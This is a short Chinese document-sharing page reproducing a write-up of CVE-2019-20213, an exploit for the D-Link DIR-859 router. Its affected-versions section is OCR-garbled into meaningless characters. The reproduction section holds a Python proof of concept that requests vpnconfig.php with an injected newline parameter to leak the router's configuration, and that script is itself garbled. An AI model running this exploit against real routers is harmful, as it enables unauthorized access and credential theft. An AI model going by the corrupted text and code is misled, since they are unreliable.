《(CVE-2019–20213)D-Link DIR-859 rce.docx》由会员分享,可在线阅读,更多相关《(CVE-2019–20213)D-Link DIR-859 rce.docx(1页珍藏版)》请在优知文库上搜索。
1、(CVE-2019-20213) D-Link DIR-859 rce一、漏洞简介 二、漏洞影响rKW jBMtaaActtf FWFiMd FWCurrM FWRoMBMMMtatIMo LaMUpdateQmtev1 UM CMWv) iSWWM3ev) ISWWM3t2Ml9om-uM AMOO UCUMOrOewtDpfwS OCM BMScfwAM r 1S101I2MMI* 1DMMMAm Mvwem三 1 MtOtBeuOi 1 tTMLMvt OTMSjmaaevrAi a efMI7WX9Dm M5l4 AVt 0l k MvMl/M UOTOfMfl MM SMp0fdMc
2、m S* c*12/M/20”DtA 6LM Aagv.l2bMMr1 JeW N.一JBMrRMwMtmd*T412MM1OIKU0W)rUMr Owft30nw4“MbnSOeut4* 112“M9I2WMD4R-M9UZ M*w*mUSi 03M2BeU02a 0Mfvl 04W3 bcrtivl OWO) xoRaw gnMda WiOt MOl*Mr*nUSvl.0M4aoidorUarDrvtpem, 1 MMUBoUtlSctvMr vwn12MX1 IMR-*XKa*wmUSLllMctl MrUMef 0ewMea121MLB.2,X AP$* o12/M/aOBtMM-WS
3、U*AJ Avl.l2tlaektarRwm Md a rKtUyMZMI9三、复现过程import requests# Miguel Mendez Z.FILES = vpnconfig.phpIP = n192.168.0.1PORT = 80headers = content-type: application/X-WWW-form-UrIenCodedprint nVPNnurl_vpn = ,httprip:portfilelPpwnd=%0a,.format(ip=IPj Port=PoRT, filel=FILES0)print(requests.get(url_vpn).text